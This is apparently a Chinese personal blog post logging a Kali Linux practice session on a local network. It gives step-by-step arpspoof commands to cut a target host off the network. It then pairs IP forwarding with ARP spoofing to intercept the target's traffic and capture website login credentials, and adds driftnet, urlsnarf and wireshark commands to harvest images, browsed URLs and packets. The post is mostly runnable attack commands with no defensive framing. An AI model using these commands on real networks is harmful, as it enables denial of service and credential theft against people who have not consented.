2018-11-09 kali内网嗅探小试记录

2019-06-03  本文已影响0人  昨天今天下雨天1

断网攻击:

首先我们需要知道攻击的目标ip及网关和我们攻击者的ip及网卡

本例中,目标IP:192.168.147.130 目标网关:192.168.147.2

本机IP:192.168.147.132 本机网卡:eth0

攻击前,先查看目标主机是否能联通互联网。经查看:可以

打开中断,输入以下命令进行断网攻击

arpspoof -i 本机网卡 -t 目标ip 目标网关

本例中命令为:arpspoof -i eth0 -t 192.168.147.130 192.168.147.2

攻击成功!

欺骗攻击(密码劫持)

同样我们也需要知道目标IP、目标网关、本机网卡、本机IP。

此例依旧使用上述目标及本机

打开终端输入命令:

echo 1 > /proc/sys/net/ipv4/ip_forward

使目标IP不断网

cat /proc/sys/net/ipv4/ip_forward

检查上述命令是否被执行,若返回1则说明命令已被执行

arpspoof -i 本机网卡 -t 目标IP 目标网关

在本例中,命令应为:

arpspoof -i eth0 -t 192.168.147.130 192.168.147.2

另起终端,用来接收劫持(盗取的信息)

随意登陆一个网站,可发现用户名及密码已被劫持。

可以看到用户名为123,而密码为一串编码,这是因为网站对密码加密的缘故,可通过解密手段对编码进行解码

主要参数:

-b               捕获到新的图片时发出嘟嘟声

-i  interface     选择监听接口

-f  file   读取一个指定pcap数据包中的图片

-p  不让所监听的接口使用混杂模式

-a  后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)

-m number 指定保存图片数的数目

-d directory  指定保存图片的路径

-x prefix  指定保存图片的前缀名

使用举例:

1.实时监听: driftnet -i wlan0

2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/

再打开一个终端,输入urlsnarf -i wlan0 监听浏览过的网页日志,等待获取

再打开一个终端,输入wireshark ,进行抓包

上一篇下一篇

猜你喜欢

热点阅读